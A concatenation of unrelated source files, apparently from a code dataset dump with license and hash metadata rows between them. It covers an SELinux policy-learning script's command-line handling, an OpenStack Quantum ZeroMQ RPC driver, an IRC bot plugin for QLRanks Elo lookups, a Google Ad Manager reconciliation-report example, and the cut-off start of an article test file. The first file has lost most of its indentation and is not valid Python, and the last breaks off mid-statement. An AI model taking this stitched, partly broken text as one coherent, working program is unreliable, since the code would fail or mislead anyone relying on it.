print("The instance didn't generate any rules but carry on nevertheless (%s/5)" % zeroRuleLoopCount)
nbRulesAddedSinceLastExecution = 0
execStart = time.time()
os.remove("/tmp/selinux-audit/lock");
print("\nThe final policy can be found at %s" % getPolicyPath(module_name, ""))
class Usage(Exception):
def __init__(self, msg):
Exception.__init__(self)
self.msg = msg
def show_help():
print("Help:\n")
print("-h or --help : This help message")
print("-m or --module : The name of the SELinux module you would like to create (mandatory)")
print("-u or --user_u : The SELinux user who will execute the application")
print("-r or --user_r : The SELinux role who will execute the application")
print("-t or --user_t : The SELinux type who will execute the application")
print("-d or --module_domain_t : The domain in which the audited application will be executed")
print("-e or --module_exec_t : The file label that will be given to the application")
print("-t or --module_tmp_domain_t : The file label that will be given to the application's tmp files")
print("-l or --module_log_domain_t : The file label that will be given to the application's log files")
print("-f or --no_fc_pass : Do not fill the fc file. Learning the policy will take one iteration less")
print("-p or --reuse_policy : Re-use a pre-existing policy and learn what's new")
def main(argv=None):
if argv is None:
argv = sys.argv
cwd = os.path.dirname(os.path.realpath(argv[0])) + '/'
os.chdir(cwd)
try:
# Check the given parameter names and get their values
try:
opts, args = getopt.getopt(argv[1:], "hvm:u:r:t:d:e:t:l:fp",
["help", "verbose", "module=", "user_u=", "user_r=", "user_t=", "module_domain_t=", "module_exec_t=", "module_tmp_domain_t=", "module_log_domain_t=", "no_fc_pass", "reuse_policy"])
except(getopt.error) as msg:
print("Argument parsing error: %s" % msg)
raise Usage(msg)
# Params
module_name = ''
module_domain_t = ''
module_exec_t = ''
module_tmp_domain_t = ''
module_log_domain_t = ''
audit_fc = True
app_fullpath = ''
user_u = user_u_default
user_r = user_r_default
user_t = user_t_default
reuse = False
# Get the parameters
for opt, arg in opts:
if opt in ("-h", "--help"):
show_help()
return 0
            elif opt in ("-v", "--verbose"):
                global verbosity
                verbosity += 1
elif opt in ("-m", "--module"):
module_name = arg
elif opt in ("-u", "--user_u"):
user_u = arg
elif opt in ("-r", "--user_r"):
user_r = arg
elif opt in ("-t", "--user_t"):
user_t = arg
elif opt in ("-e", "--module_exec_t"):
module_exec_t = arg
elif opt in ("-d", "--module_domain_t"):
module_domain_t = arg
elif opt in ("-t", "--module_tmp_domain_t"):
module_tmp_domain_t = arg
elif opt in ("-l", "--module_log_domain_t"):
module_log_domain_t = arg
elif opt in ("-f", "--no_fc_pass"):
audit_fc = False
elif opt in ("-p", "--reuse_policy"):
reuse = True
# if there are no args left, then an error happened
if len(args) == 0 or module_name == '':
print('Usage: %s [options] -m module_name filepath' % sys.argv[0], file=sys.stderr)
else:
# Get the fullpath
app_fullpath = args[len(args)-1]
# Set the default value for module_domain_t & module_exec_t if there were not set by the user
if module_domain_t == '':
module_domain_t = module_domain_t_default_pattern.replace("%modulename%", module_name)
if module_exec_t == '':
module_exec_t = module_exec_t_default_pattern.replace("%modulename%", module_name)
if module_tmp_domain_t == '':
module_tmp_domain_t = module_tmp_domain_t_default_pattern.replace("%modulename%", module_name)
if module_log_domain_t == '':
module_log_domain_t = module_log_domain_t_default_pattern.replace("%modulename%", module_name)
# Let's recap to the user what he has chosen.
print('You are about to create a SELinux module for the application')
print('')
print('Here is the summary of how it will be created:')
print(' Module name (-m): %s' % module_name)
print(' Application path: \'%s\'' % app_fullpath)
print(' Will be labelled as ():():(-e):%s:%s:%s' % ('system_u', 'object_r', module_exec_t))
print(' Be executed by (-u):(-r):(-t): %s:%s:%s' % (user_u, user_r, user_t))
print(' Jailed in the domain (-d): %s' % module_domain_t)
print(' Tmp file\'s domain is (-t): %s' % module_tmp_domain_t)
print(' Log file\'s domain is (-l): %s' % module_log_domain_t)
print(' Do not audit the fc file (bad practice!) (-f): %s' % (not audit_fc))
print(' Re-use an existing policy (-p): %s' % (reuse))
print('')
print('Do you agree with that ? (Y/n)')
answer=input('')
if answer in ('', 'y', 'Y', 'Yes', 'yes'):
startAuditing(module_name, app_fullpath, module_domain_t, module_tmp_domain_t, module_log_domain_t, module_exec_t, user_u, user_r, user_t, audit_fc, reuse)
else:
return 0
except(Usage) as err:
print('%s: %s' % (sys.argv[0], err.msg), file=sys.stderr)
print('For a list of available options, use "%s --help"'\
% sys.argv[0], file=sys.stderr)
return -1
if __name__ == '__main__':
main()
| gpl-3.0 | -7,108,910,309,036,765,000 | 32.52431 | 267 | 0.65428 | false |
rossella/neutron | quantum/openstack/common/rpc/impl_zmq.py | 1 | 25519 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Cloudscaling Group, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import pprint
import socket
import string
import sys
import types
import uuid
import eventlet
import greenlet
from quantum.openstack.common import cfg
from quantum.openstack.common.gettextutils import _
from quantum.openstack.common import importutils
from quantum.openstack.common import jsonutils
from quantum.openstack.common import processutils as utils
from quantum.openstack.common.rpc import common as rpc_common
zmq = importutils.try_import('eventlet.green.zmq')
# Aliases defined here for convenience; they are not modified.
pformat = pprint.pformat
Timeout = eventlet.timeout.Timeout
LOG = rpc_common.LOG
RemoteError = rpc_common.RemoteError
RPCException = rpc_common.RPCException
zmq_opts = [
cfg.StrOpt('rpc_zmq_bind_address', default='*',
help='ZeroMQ bind address. Should be a wildcard (*), '
'an ethernet interface, or IP. '
'The "host" option should point or resolve to this '
'address.'),
# The module.Class to use for matchmaking.
cfg.StrOpt(
'rpc_zmq_matchmaker',
default=('quantum.openstack.common.rpc.'
'matchmaker.MatchMakerLocalhost'),
help='MatchMaker driver',
),
# The following port is unassigned by IANA as of 2012-05-21
cfg.IntOpt('rpc_zmq_port', default=9501,
help='ZeroMQ receiver listening port'),
cfg.IntOpt('rpc_zmq_contexts', default=1,
help='Number of ZeroMQ contexts, defaults to 1'),
cfg.IntOpt('rpc_zmq_topic_backlog', default=None,
help='Maximum number of ingress messages to locally buffer '
'per topic. Default is unlimited.'),
cfg.StrOpt('rpc_zmq_ipc_dir', default='/var/run/openstack',
help='Directory for holding IPC sockets'),
cfg.StrOpt('rpc_zmq_host', default=socket.gethostname(),
help='Name of this node. Must be a valid hostname, FQDN, or '
'IP address. Must match "host" option, if running Nova.')
]
CONF = cfg.CONF
CONF.register_opts(zmq_opts)
ZMQ_CTX = None # ZeroMQ Context, must be global.
matchmaker = None # memoized matchmaker object
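# For orientation, a hedged example of how the options above might appear in a
# service configuration file (the values are illustrative, not recommendations):
#
#   [DEFAULT]
#   rpc_zmq_bind_address = *
#   rpc_zmq_port = 9501
#   rpc_zmq_contexts = 1
#   rpc_zmq_ipc_dir = /var/run/openstack
#   rpc_zmq_matchmaker = quantum.openstack.common.rpc.matchmaker.MatchMakerLocalhost
#   rpc_zmq_host = node-01.example.com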
def _serialize(data):
"""
Serialization wrapper
We prefer using JSON, but it cannot encode all types.
Error if a developer passes us bad data.
"""
try:
return str(jsonutils.dumps(data, ensure_ascii=True))
except TypeError:
LOG.error(_("JSON serialization failed."))
raise
def _deserialize(data):
"""
Deserialization wrapper
"""
LOG.debug(_("Deserializing: %s"), data)
return jsonutils.loads(data)
class ZmqSocket(object):
"""
A tiny wrapper around ZeroMQ to simplify the send/recv protocol
and connection management.
    This class is not a context manager; call close() explicitly when done.
"""
def __init__(self, addr, zmq_type, bind=True, subscribe=None):
self.sock = _get_ctxt().socket(zmq_type)
self.addr = addr
self.type = zmq_type
self.subscriptions = []
# Support failures on sending/receiving on wrong socket type.
self.can_recv = zmq_type in (zmq.PULL, zmq.SUB)
self.can_send = zmq_type in (zmq.PUSH, zmq.PUB)
self.can_sub = zmq_type in (zmq.SUB, )
# Support list, str, & None for subscribe arg (cast to list)
do_sub = {
list: subscribe,
str: [subscribe],
type(None): []
}[type(subscribe)]
for f in do_sub:
self.subscribe(f)
str_data = {'addr': addr, 'type': self.socket_s(),
'subscribe': subscribe, 'bind': bind}
LOG.debug(_("Connecting to %(addr)s with %(type)s"), str_data)
LOG.debug(_("-> Subscribed to %(subscribe)s"), str_data)
LOG.debug(_("-> bind: %(bind)s"), str_data)
try:
if bind:
self.sock.bind(addr)
else:
self.sock.connect(addr)
except Exception:
raise RPCException(_("Could not open socket."))
def socket_s(self):
"""Get socket type as string."""
t_enum = ('PUSH', 'PULL', 'PUB', 'SUB', 'REP', 'REQ', 'ROUTER',
'DEALER')
return dict(map(lambda t: (getattr(zmq, t), t), t_enum))[self.type]
def subscribe(self, msg_filter):
"""Subscribe."""
if not self.can_sub:
raise RPCException("Cannot subscribe on this socket.")
LOG.debug(_("Subscribing to %s"), msg_filter)
try:
self.sock.setsockopt(zmq.SUBSCRIBE, msg_filter)
except Exception:
return
self.subscriptions.append(msg_filter)
def unsubscribe(self, msg_filter):
"""Unsubscribe."""
if msg_filter not in self.subscriptions:
return
self.sock.setsockopt(zmq.UNSUBSCRIBE, msg_filter)
self.subscriptions.remove(msg_filter)
def close(self):
if self.sock is None or self.sock.closed:
return
# We must unsubscribe, or we'll leak descriptors.
if len(self.subscriptions) > 0:
for f in self.subscriptions:
try:
self.sock.setsockopt(zmq.UNSUBSCRIBE, f)
except Exception:
pass
self.subscriptions = []
try:
# Default is to linger
self.sock.close()
except Exception:
# While this is a bad thing to happen,
# it would be much worse if some of the code calling this
# were to fail. For now, lets log, and later evaluate
# if we can safely raise here.
LOG.error("ZeroMQ socket could not be closed.")
self.sock = None
def recv(self):
if not self.can_recv:
raise RPCException(_("You cannot recv on this socket."))
return self.sock.recv_multipart()
def send(self, data):
if not self.can_send:
raise RPCException(_("You cannot send on this socket."))
self.sock.send_multipart(data)
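# Minimal usage sketch for ZmqSocket (illustrative only; the IPC address and
# the helper name are assumptions, and it requires eventlet.green.zmq to be
# importable, i.e. the module-level `zmq` must not be None):
def _example_push_pull(addr='ipc:///tmp/zmq_sketch'):
    receiver = ZmqSocket(addr, zmq.PULL, bind=True)
    sender = ZmqSocket(addr, zmq.PUSH, bind=False)
    try:
        sender.send(['hello'])   # multipart send; str payloads under Python 2
        return receiver.recv()   # blocks until the message arrives
    finally:
        sender.close()
        receiver.close()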
class ZmqClient(object):
"""Client for ZMQ sockets."""
def __init__(self, addr, socket_type=None, bind=False):
if socket_type is None:
socket_type = zmq.PUSH
self.outq = ZmqSocket(addr, socket_type, bind=bind)
def cast(self, msg_id, topic, data, serialize=True, force_envelope=False):
if serialize:
data = rpc_common.serialize_msg(data, force_envelope)
self.outq.send([str(msg_id), str(topic), str('cast'),
_serialize(data)])
def close(self):
self.outq.close()
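# A hedged note on the wire format implied by ZmqClient.cast() and unpacked by
# the reactors below; every message is a four-part multipart send (the sample
# values are invented):
#
#   [msg_id, topic, style, payload]
#     msg_id  - reply-tracking id (a uuid4 hex for calls, the topic for casts)
#     topic   - routing key, e.g. 'network' or 'zmq_replies.node-01'
#     style   - currently always the literal string 'cast'
#     payload - _serialize()d JSON: [marshalled RpcContext, message dict]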
class RpcContext(rpc_common.CommonRpcContext):
"""Context that supports replying to a rpc.call."""
def __init__(self, **kwargs):
self.replies = []
super(RpcContext, self).__init__(**kwargs)
def deepcopy(self):
values = self.to_dict()
values['replies'] = self.replies
return self.__class__(**values)
def reply(self, reply=None, failure=None, ending=False):
if ending:
return
self.replies.append(reply)
@classmethod
def marshal(self, ctx):
ctx_data = ctx.to_dict()
return _serialize(ctx_data)
@classmethod
def unmarshal(self, data):
return RpcContext.from_dict(_deserialize(data))
class InternalContext(object):
"""Used by ConsumerBase as a private context for - methods."""
def __init__(self, proxy):
self.proxy = proxy
self.msg_waiter = None
def _get_response(self, ctx, proxy, topic, data):
"""Process a curried message and cast the result to topic."""
LOG.debug(_("Running func with context: %s"), ctx.to_dict())
data.setdefault('version', None)
data.setdefault('args', {})
try:
result = proxy.dispatch(
ctx, data['version'], data['method'], **data['args'])
return ConsumerBase.normalize_reply(result, ctx.replies)
except greenlet.GreenletExit:
# ignore these since they are just from shutdowns
pass
except rpc_common.ClientException, e:
LOG.debug(_("Expected exception during message handling (%s)") %
e._exc_info[1])
return {'exc':
rpc_common.serialize_remote_exception(e._exc_info,
log_failure=False)}
except Exception:
LOG.error(_("Exception during message handling"))
return {'exc':
rpc_common.serialize_remote_exception(sys.exc_info())}
def reply(self, ctx, proxy,
msg_id=None, context=None, topic=None, msg=None):
"""Reply to a casted call."""
# Our real method is curried into msg['args']
child_ctx = RpcContext.unmarshal(msg[0])
response = ConsumerBase.normalize_reply(
self._get_response(child_ctx, proxy, topic, msg[1]),
ctx.replies)
LOG.debug(_("Sending reply"))
cast(CONF, ctx, topic, {
'method': '-process_reply',
'args': {
'msg_id': msg_id,
'response': response
}
})
class ConsumerBase(object):
"""Base Consumer."""
def __init__(self):
self.private_ctx = InternalContext(None)
@classmethod
def normalize_reply(self, result, replies):
#TODO(ewindisch): re-evaluate and document this method.
if isinstance(result, types.GeneratorType):
return list(result)
elif replies:
return replies
else:
return [result]
def process(self, style, target, proxy, ctx, data):
# Method starting with - are
# processed internally. (non-valid method name)
method = data['method']
# Internal method
# uses internal context for safety.
if data['method'][0] == '-':
# For reply / process_reply
method = method[1:]
if method == 'reply':
self.private_ctx.reply(ctx, proxy, **data['args'])
return
data.setdefault('version', None)
data.setdefault('args', {})
proxy.dispatch(ctx, data['version'],
data['method'], **data['args'])
class ZmqBaseReactor(ConsumerBase):
"""
A consumer class implementing a
centralized casting broker (PULL-PUSH)
for RoundRobin requests.
"""
def __init__(self, conf):
super(ZmqBaseReactor, self).__init__()
self.mapping = {}
self.proxies = {}
self.threads = []
self.sockets = []
self.subscribe = {}
self.pool = eventlet.greenpool.GreenPool(conf.rpc_thread_pool_size)
def register(self, proxy, in_addr, zmq_type_in, out_addr=None,
zmq_type_out=None, in_bind=True, out_bind=True,
subscribe=None):
LOG.info(_("Registering reactor"))
if zmq_type_in not in (zmq.PULL, zmq.SUB):
raise RPCException("Bad input socktype")
# Items push in.
inq = ZmqSocket(in_addr, zmq_type_in, bind=in_bind,
subscribe=subscribe)
self.proxies[inq] = proxy
self.sockets.append(inq)
LOG.info(_("In reactor registered"))
if not out_addr:
return
if zmq_type_out not in (zmq.PUSH, zmq.PUB):
raise RPCException("Bad output socktype")
# Items push out.
outq = ZmqSocket(out_addr, zmq_type_out, bind=out_bind)
self.mapping[inq] = outq
self.mapping[outq] = inq
self.sockets.append(outq)
LOG.info(_("Out reactor registered"))
def consume_in_thread(self):
def _consume(sock):
LOG.info(_("Consuming socket"))
while True:
self.consume(sock)
for k in self.proxies.keys():
self.threads.append(
self.pool.spawn(_consume, k)
)
def wait(self):
for t in self.threads:
t.wait()
def close(self):
for s in self.sockets:
s.close()
for t in self.threads:
t.kill()
class ZmqProxy(ZmqBaseReactor):
"""
A consumer class implementing a
topic-based proxy, forwarding to
IPC sockets.
"""
def __init__(self, conf):
super(ZmqProxy, self).__init__(conf)
self.topic_proxy = {}
def consume(self, sock):
ipc_dir = CONF.rpc_zmq_ipc_dir
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
msg_id, topic, style, in_msg = data
topic = topic.split('.', 1)[0]
LOG.debug(_("CONSUMER GOT %s"), ' '.join(map(pformat, data)))
# Handle zmq_replies magic
if topic.startswith('fanout~'):
sock_type = zmq.PUB
elif topic.startswith('zmq_replies'):
sock_type = zmq.PUB
inside = rpc_common.deserialize_msg(_deserialize(in_msg))
msg_id = inside[-1]['args']['msg_id']
response = inside[-1]['args']['response']
LOG.debug(_("->response->%s"), response)
data = [str(msg_id), _serialize(response)]
else:
sock_type = zmq.PUSH
if not topic in self.topic_proxy:
def publisher(waiter):
LOG.info(_("Creating proxy for topic: %s"), topic)
try:
out_sock = ZmqSocket("ipc://%s/zmq_topic_%s" %
(ipc_dir, topic),
sock_type, bind=True)
except RPCException:
waiter.send_exception(*sys.exc_info())
return
self.topic_proxy[topic] = eventlet.queue.LightQueue(
CONF.rpc_zmq_topic_backlog)
self.sockets.append(out_sock)
# It takes some time for a pub socket to open,
# before we can have any faith in doing a send() to it.
if sock_type == zmq.PUB:
eventlet.sleep(.5)
waiter.send(True)
while(True):
data = self.topic_proxy[topic].get()
out_sock.send(data)
LOG.debug(_("ROUTER RELAY-OUT SUCCEEDED %(data)s") %
{'data': data})
wait_sock_creation = eventlet.event.Event()
eventlet.spawn(publisher, wait_sock_creation)
try:
wait_sock_creation.wait()
except RPCException:
LOG.error(_("Topic socket file creation failed."))
return
try:
self.topic_proxy[topic].put_nowait(data)
LOG.debug(_("ROUTER RELAY-OUT QUEUED %(data)s") %
{'data': data})
except eventlet.queue.Full:
LOG.error(_("Local per-topic backlog buffer full for topic "
"%(topic)s. Dropping message.") % {'topic': topic})
def consume_in_thread(self):
"""Runs the ZmqProxy service"""
ipc_dir = CONF.rpc_zmq_ipc_dir
consume_in = "tcp://%s:%s" % \
(CONF.rpc_zmq_bind_address,
CONF.rpc_zmq_port)
consumption_proxy = InternalContext(None)
if not os.path.isdir(ipc_dir):
try:
utils.execute('mkdir', '-p', ipc_dir, run_as_root=True)
utils.execute('chown', "%s:%s" % (os.getuid(), os.getgid()),
ipc_dir, run_as_root=True)
utils.execute('chmod', '750', ipc_dir, run_as_root=True)
except utils.ProcessExecutionError:
LOG.error(_("Could not create IPC directory %s") %
(ipc_dir, ))
raise
try:
self.register(consumption_proxy,
consume_in,
zmq.PULL,
out_bind=True)
except zmq.ZMQError:
LOG.error(_("Could not create ZeroMQ receiver daemon. "
"Socket may already be in use."))
raise
super(ZmqProxy, self).consume_in_thread()
class ZmqReactor(ZmqBaseReactor):
"""
A consumer class implementing a
consumer for messages. Can also be
used as a 1:1 proxy
"""
def __init__(self, conf):
super(ZmqReactor, self).__init__(conf)
def consume(self, sock):
#TODO(ewindisch): use zero-copy (i.e. references, not copying)
data = sock.recv()
LOG.debug(_("CONSUMER RECEIVED DATA: %s"), data)
if sock in self.mapping:
LOG.debug(_("ROUTER RELAY-OUT %(data)s") % {
'data': data})
self.mapping[sock].send(data)
return
msg_id, topic, style, in_msg = data
ctx, request = rpc_common.deserialize_msg(_deserialize(in_msg))
ctx = RpcContext.unmarshal(ctx)
proxy = self.proxies[sock]
self.pool.spawn_n(self.process, style, topic,
proxy, ctx, request)
class Connection(rpc_common.Connection):
"""Manages connections and threads."""
def __init__(self, conf):
self.reactor = ZmqReactor(conf)
def create_consumer(self, topic, proxy, fanout=False):
# Only consume on the base topic name.
topic = topic.split('.', 1)[0]
LOG.info(_("Create Consumer for topic (%(topic)s)") %
{'topic': topic})
# Subscription scenarios
if fanout:
subscribe = ('', fanout)[type(fanout) == str]
sock_type = zmq.SUB
topic = 'fanout~' + topic
else:
sock_type = zmq.PULL
subscribe = None
# Receive messages from (local) proxy
inaddr = "ipc://%s/zmq_topic_%s" % \
(CONF.rpc_zmq_ipc_dir, topic)
LOG.debug(_("Consumer is a zmq.%s"),
['PULL', 'SUB'][sock_type == zmq.SUB])
self.reactor.register(proxy, inaddr, sock_type,
subscribe=subscribe, in_bind=False)
def close(self):
self.reactor.close()
def wait(self):
self.reactor.wait()
def consume_in_thread(self):
self.reactor.consume_in_thread()
def _cast(addr, context, msg_id, topic, msg, timeout=None, serialize=True,
force_envelope=False):
timeout_cast = timeout or CONF.rpc_cast_timeout
payload = [RpcContext.marshal(context), msg]
with Timeout(timeout_cast, exception=rpc_common.Timeout):
try:
conn = ZmqClient(addr)
# assumes cast can't return an exception
conn.cast(msg_id, topic, payload, serialize, force_envelope)
except zmq.ZMQError:
raise RPCException("Cast failed. ZMQ Socket Exception")
finally:
if 'conn' in vars():
conn.close()
def _call(addr, context, msg_id, topic, msg, timeout=None,
serialize=True, force_envelope=False):
# timeout_response is how long we wait for a response
timeout = timeout or CONF.rpc_response_timeout
# The msg_id is used to track replies.
msg_id = uuid.uuid4().hex
# Replies always come into the reply service.
reply_topic = "zmq_replies.%s" % CONF.rpc_zmq_host
LOG.debug(_("Creating payload"))
# Curry the original request into a reply method.
mcontext = RpcContext.marshal(context)
payload = {
'method': '-reply',
'args': {
'msg_id': msg_id,
'context': mcontext,
'topic': reply_topic,
'msg': [mcontext, msg]
}
}
LOG.debug(_("Creating queue socket for reply waiter"))
# Messages arriving async.
# TODO(ewindisch): have reply consumer with dynamic subscription mgmt
with Timeout(timeout, exception=rpc_common.Timeout):
try:
msg_waiter = ZmqSocket(
"ipc://%s/zmq_topic_zmq_replies" % CONF.rpc_zmq_ipc_dir,
zmq.SUB, subscribe=msg_id, bind=False
)
LOG.debug(_("Sending cast"))
_cast(addr, context, msg_id, topic, payload,
serialize=serialize, force_envelope=force_envelope)
LOG.debug(_("Cast sent; Waiting reply"))
# Blocks until receives reply
msg = msg_waiter.recv()
LOG.debug(_("Received message: %s"), msg)
LOG.debug(_("Unpacking response"))
responses = _deserialize(msg[-1])
# ZMQError trumps the Timeout error.
except zmq.ZMQError:
raise RPCException("ZMQ Socket Error")
finally:
if 'msg_waiter' in vars():
msg_waiter.close()
# It seems we don't need to do all of the following,
# but perhaps it would be useful for multicall?
# One effect of this is that we're checking all
# responses for Exceptions.
for resp in responses:
if isinstance(resp, types.DictType) and 'exc' in resp:
raise rpc_common.deserialize_remote_exception(CONF, resp['exc'])
return responses[-1]
def _multi_send(method, context, topic, msg, timeout=None, serialize=True,
force_envelope=False):
"""
Wraps the sending of messages,
dispatches to the matchmaker and sends
message to all relevant hosts.
"""
conf = CONF
LOG.debug(_("%(msg)s") % {'msg': ' '.join(map(pformat, (topic, msg)))})
queues = _get_matchmaker().queues(topic)
LOG.debug(_("Sending message(s) to: %s"), queues)
# Don't stack if we have no matchmaker results
if len(queues) == 0:
LOG.warn(_("No matchmaker results. Not casting."))
# While not strictly a timeout, callers know how to handle
# this exception and a timeout isn't too big a lie.
raise rpc_common.Timeout, "No match from matchmaker."
# This supports brokerless fanout (addresses > 1)
for queue in queues:
(_topic, ip_addr) = queue
_addr = "tcp://%s:%s" % (ip_addr, conf.rpc_zmq_port)
if method.__name__ == '_cast':
eventlet.spawn_n(method, _addr, context,
_topic, _topic, msg, timeout, serialize,
force_envelope)
return
return method(_addr, context, _topic, _topic, msg, timeout,
serialize, force_envelope)
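# Hedged example of driving the module-level API below (the topic, method name
# and arguments are invented for illustration):
#
#   ctx = RpcContext(user_id='u1', project_id='p1')
#   cast(CONF, ctx, 'network', {'method': 'refresh', 'args': {'id': 42}})
#   ret = call(CONF, ctx, 'network', {'method': 'get', 'args': {'id': 42}},
#              timeout=30)
#
# cast() fans out through the matchmaker and returns immediately; call()
# additionally subscribes to 'zmq_replies.<rpc_zmq_host>' and blocks for the
# response (or raises rpc_common.Timeout).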
def create_connection(conf, new=True):
return Connection(conf)
def multicall(conf, *args, **kwargs):
"""Multiple calls."""
return _multi_send(_call, *args, **kwargs)
def call(conf, *args, **kwargs):
"""Send a message, expect a response."""
data = _multi_send(_call, *args, **kwargs)
return data[-1]
def cast(conf, *args, **kwargs):
"""Send a message expecting no reply."""
_multi_send(_cast, *args, **kwargs)
def fanout_cast(conf, context, topic, msg, **kwargs):
"""Send a message to all listening and expect no reply."""
# NOTE(ewindisch): fanout~ is used because it avoid splitting on .
# and acts as a non-subtle hint to the matchmaker and ZmqProxy.
_multi_send(_cast, context, 'fanout~' + str(topic), msg, **kwargs)
def notify(conf, context, topic, msg, **kwargs):
"""
Send notification event.
Notifications are sent to topic-priority.
This differs from the AMQP drivers which send to topic.priority.
"""
# NOTE(ewindisch): dot-priority in rpc notifier does not
# work with our assumptions.
    topic = topic.replace('.', '-')
kwargs['serialize'] = kwargs.pop('envelope')
kwargs['force_envelope'] = True
cast(conf, context, topic, msg, **kwargs)
def cleanup():
"""Clean up resources in use by implementation."""
global ZMQ_CTX
if ZMQ_CTX:
ZMQ_CTX.term()
ZMQ_CTX = None
global matchmaker
matchmaker = None
def _get_ctxt():
if not zmq:
raise ImportError("Failed to import eventlet.green.zmq")
global ZMQ_CTX
if not ZMQ_CTX:
ZMQ_CTX = zmq.Context(CONF.rpc_zmq_contexts)
return ZMQ_CTX
def _get_matchmaker():
global matchmaker
if not matchmaker:
# rpc_zmq_matchmaker should be set to a 'module.Class'
mm_path = CONF.rpc_zmq_matchmaker.split('.')
mm_module = '.'.join(mm_path[:-1])
mm_class = mm_path[-1]
# Only initialize a class.
if mm_path[-1][0] not in string.ascii_uppercase:
LOG.error(_("Matchmaker could not be loaded.\n"
"rpc_zmq_matchmaker is not a class."))
raise RPCException(_("Error loading Matchmaker."))
mm_impl = importutils.import_module(mm_module)
mm_constructor = getattr(mm_impl, mm_class)
matchmaker = mm_constructor()
return matchmaker
| apache-2.0 | -8,324,594,890,385,945,000 | 31.018821 | 78 | 0.568361 | false |
anlutro/botologist | plugins/qlranks.py | 1 | 2116 | import logging
log = logging.getLogger(__name__)
import requests
import requests.exceptions
import botologist.plugin
def _get_qlr_data(nick):
url = "http://www.qlranks.com/api.aspx"
response = requests.get(url, {"nick": nick}, timeout=4)
return response.json()["players"][0]
def _get_qlr_elo(nick, modes=None):
"""
Get someone's QLRanks ELO.
nick should be a valid Quake Live nickname. modes should be an iterable
(list, tuple) of game-modes to display ELO for (duel, ctf, tdm...)
"""
if modes is None:
modes = ("duel",)
try:
data = _get_qlr_data(nick)
except requests.exceptions.RequestException:
log.warning("QLRanks request caused an exception", exc_info=True)
return "HTTP error, try again!"
# qlranks returns rank 0 indicating a player has no rating - if all modes
# have rank 0, it is safe to assume the player does not exist
unranked = [mode["rank"] == 0 for mode in data.values() if isinstance(mode, dict)]
if all(unranked):
return "Player not found or no games played: " + data.get("nick", "unknown")
retval = data["nick"]
# convert to set to prevent duplicates
for mode in set(modes):
if mode not in data:
return "Unknown mode: " + mode
if data[mode]["rank"] == 0:
retval += " - {mode}: unranked".format(mode=mode)
else:
retval += " - {mode}: {elo} (rank {rank:,})".format(
mode=mode, elo=data[mode]["elo"], rank=data[mode]["rank"]
)
return retval
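# Minimal usage sketch (the nickname and ratings are invented; a real call
# performs an HTTP request to qlranks.com):
#
#   >>> _get_qlr_elo('somePlayer', modes=('duel', 'ctf'))
#   'somePlayer - duel: 1450 (rank 2,345) - ctf: unranked'
#
# The string shape follows the formatting branches in _get_qlr_elo() above.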
class QlranksPlugin(botologist.plugin.Plugin):
"""QLRanks plugin."""
@botologist.plugin.command("elo", threaded=True)
def get_elo(self, msg):
"""Get a player's ELO from qlranks."""
if len(msg.args) < 1:
return
if len(msg.args) > 1:
if "," in msg.args[1]:
modes = msg.args[1].split(",")
else:
modes = msg.args[1:]
return _get_qlr_elo(msg.args[0], modes)
else:
return _get_qlr_elo(msg.args[0])
| mit | 1,812,270,986,986,135,800 | 28.388889 | 86 | 0.58034 | false |
Aloomaio/googleads-python-lib | examples/ad_manager/v201808/reconciliation_report_row_service/get_reconciliation_report_rows_for_reconciliation_report.py | 1 | 2609 | #!/usr/bin/env python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Gets a reconciliation report's rows for line items that Ad Manager served.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Set the ID of the reconciliation report row.
RECONCILIATION_REPORT_ID = 'INSERT_RECONCILIATION_REPORT_ID_HERE'
def main(client, reconciliation_report_id):
# Initialize appropriate service.
reconciliation_report_row_service = client.GetService(
'ReconciliationReportRowService', version='v201808')
# Create a statement to select reconciliation report rows.
statement = (ad_manager.StatementBuilder(version='v201808')
.Where(('reconciliationReportId = :reportId '
'AND lineItemId != :lineItemId'))
.WithBindVariable('lineItemId', 0)
.WithBindVariable('reportId', long(reconciliation_report_id)))
# Retrieve a small amount of reconciliation report rows at a time, paging
# through until all reconciliation report rows have been retrieved.
while True:
response = (
reconciliation_report_row_service
.getReconciliationReportRowsByStatement(
statement.ToStatement()))
if 'results' in response and len(response['results']):
for reconciliation_report_row in response['results']:
# Print out some information for each reconciliation report row.
print('Reconciliation report row with ID "%d", reconciliation source '
'"%s", and reconciled volume "%d" was found.\n' %
(reconciliation_report_row['id'],
reconciliation_report_row['reconciliationSource'],
reconciliation_report_row['reconciledVolume']))
statement.offset += statement.limit
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, RECONCILIATION_REPORT_ID)
| apache-2.0 | 5,258,400,101,180,364,000 | 39.765625 | 78 | 0.706401 | false |
ZeitOnline/zeit.content.article | src/zeit/content/article/tests/test_article.py | 1 | 17840 | # coding: utf8
from zeit.cms.workflow.interfaces import CAN_PUBLISH_ERROR
from zeit.cms.workflow.interfaces import CAN_PUBLISH_SUCCESS
import lxml.etree
import mock
import zeit.cms.checkout.helper
import zeit.cms.content.interfaces
import zeit.cms.content.reference
import zeit.cms.interfaces
import zeit.cms.workflow.interfaces
import zeit.cms.section.interfaces
import zeit.content.article.edit.interfaces
import zeit.content.article.testing
import zeit.content.image.imagegroup
import zeit.magazin.interfaces
import zeit.edit.interfaces
import zeit.edit.rule
import zope.component
import zope.event
import zope.interface
import zope.lifecycleevent
class WorkflowTest(zeit.content.article.testing.FunctionalTestCase):
def setUp(self):
super(WorkflowTest, self).setUp()
self.article = zeit.cms.interfaces.ICMSContent(
